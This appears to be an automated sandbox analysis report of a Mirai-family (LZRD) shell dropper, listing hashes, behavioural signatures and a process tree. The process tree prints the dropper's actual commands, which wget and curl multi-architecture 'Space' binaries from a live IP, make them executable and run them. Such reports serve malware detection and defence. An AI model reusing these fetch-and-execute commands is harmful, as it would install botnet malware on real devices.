Analysis
max time kernel: 149s
max time network: 153s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 22/12/2024, 12:41
Tasks
Static task: static1
Behavioral task: behavioral1 (sample 1.sh, resource ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample 1.sh, resource debian9-armhf-20240418-en)
Behavioral task: behavioral3 (sample 1.sh, resource debian9-mipsbe-20240611-en)
General
Target: 1.sh
Size: 2KB
MD5: 8364b34731a2e12ce67c2cfcb2811e75
SHA1: 5d718457dfa0ecc1a46528696d2769d11adf018f
SHA256: cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea
SHA512: ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9
Malware Config
Extracted: mirai, LZRD
Extracted: mirai, LZRD
Signatures

- Mirai family

- File and Directory Permissions Modification (1 TTPs, 6 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  1491  chmod
  1497  chmod
  1514  chmod
  1524  chmod
  1534  chmod
  1544  chmod

- Executes dropped EXE (6 IoCs)
  ioc         pid   Process
  /tmp/Space  1492  Space
  /tmp/Space  1498  Space
  /tmp/Space  1515  Space
  /tmp/Space  1525  Space
  /tmp/Space  1535  Space
  /tmp/Space  1545  Space

- Modifies Watchdog functionality (1 TTPs, 10 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process
  File opened for modification  /dev/misc/watchdog  Space
  File opened for modification  /dev/misc/watchdog  Space
  File opened for modification  /dev/watchdog       Space
  File opened for modification  /dev/misc/watchdog  Space
  File opened for modification  /dev/watchdog       Space
  File opened for modification  /dev/misc/watchdog  Space
  File opened for modification  /dev/watchdog       Space
  File opened for modification  /dev/misc/watchdog  Space
  File opened for modification  /dev/watchdog       Space
  File opened for modification  /dev/watchdog       Space

- Enumerates running processes
  Discovers information about currently running processes on the system

- Writes file to system bin folder (10 IoCs)
  description                   ioc             Process
  File opened for modification  /sbin/watchdog  Space
  File opened for modification  /sbin/watchdog  Space
  File opened for modification  /bin/watchdog   Space
  File opened for modification  /sbin/watchdog  Space
  File opened for modification  /bin/watchdog   Space
  File opened for modification  /bin/watchdog   Space
  File opened for modification  /bin/watchdog   Space
  File opened for modification  /bin/watchdog   Space
  File opened for modification  /sbin/watchdog  Space
  File opened for modification  /sbin/watchdog  Space

- YARA match
  resource                          yara_rule
  behavioral1/files/fstream-5.dat   upx
- System Network Configuration Discovery (1 TTPs, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  1531  wget
  1532  curl
  1541  wget
  1542  curl

- Writes file to tmp directory (13 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc                Process
  File opened for modification  /tmp/Space.x86     curl
  File opened for modification  /tmp/Space.x86_64  wget
  File opened for modification  /tmp/Space.mips    curl
  File opened for modification  /tmp/busybox       cp
  File opened for modification  /tmp/Space.arc     wget
  File opened for modification  /tmp/Space         1.sh
  File opened for modification  /tmp/Space.x86     wget
  File opened for modification  /tmp/Space.mips    wget
  File opened for modification  /tmp/Space.mips64  curl
  File opened for modification  /tmp/Space.arc     curl
  File opened for modification  /tmp/Space.x86_64  curl
  File opened for modification  /tmp/Space.i686    wget
  File opened for modification  /tmp/Space.i686    curl
Processes (child processes are indented under the parent /tmp/1.sh)

/tmp/1.sh
  command: /tmp/1.sh
  PID: 1475
  - Writes file to tmp directory

  /bin/cp
    command: cp /bin/busybox /tmp/
    PID: 1476
    - Writes file to tmp directory

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.arc
    PID: 1477
    - Writes file to tmp directory

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.arc
    PID: 1489
    - Writes file to tmp directory

  /bin/cat
    command: cat Space.arc
    PID: 1490

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1491
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1492
    - Executes dropped EXE

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.x86
    PID: 1494
    - Writes file to tmp directory

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.x86
    PID: 1495
    - Writes file to tmp directory

  /bin/cat
    command: cat Space.x86
    PID: 1496

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1497
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1498
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Reads runtime system information

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.x86_64
    PID: 1511
    - Writes file to tmp directory

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.x86_64
    PID: 1512
    - Writes file to tmp directory

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1514
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1515
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Reads runtime system information

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.i686
    PID: 1521
    - Writes file to tmp directory

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.i686
    PID: 1522
    - Writes file to tmp directory

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1524
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1525
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Reads runtime system information

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.mips
    PID: 1531
    - System Network Configuration Discovery
    - Writes file to tmp directory

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.mips
    PID: 1532
    - System Network Configuration Discovery
    - Writes file to tmp directory

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1534
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1535
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Reads runtime system information

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.mips64
    PID: 1541
    - System Network Configuration Discovery

  /usr/bin/curl
    command: curl -O http://154.216.20.221/hiddenbin/Space.mips64
    PID: 1542
    - System Network Configuration Discovery
    - Writes file to tmp directory

  /bin/chmod
    command: chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
    PID: 1544
    - File and Directory Permissions Modification

  /tmp/Space
    command: ./Space
    PID: 1545
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Reads runtime system information

  /usr/bin/wget
    command: wget http://154.216.20.221/hiddenbin/Space.mpsl
    PID: 1551
MITRE ATT&CK Enterprise v15
Downloads

1. Filesize: 37KB
   MD5: b73e8fbb7aee4bbe5902554d6ab22092
   SHA1: 620097bfd55d8ade8d138bb2ba10e8d4c43fd105
   SHA256: 22dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04
   SHA512: d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8

2. Filesize: 113KB
   MD5: 0fdd3e751fa9d0f60c5a218e4269c9ad
   SHA1: 0d9ae7d06494f59cfc3bfba8e162e29630159be3
   SHA256: 81749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528
   SHA512: 2b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de

3. Filesize: 2.0MB
   MD5: b4dede5fc0b1bad5cb8e901bde126b97
   SHA1: 10cbe9a418ad84a1ed297948539d37aeb58dd810
   SHA256: a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
   SHA512: 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6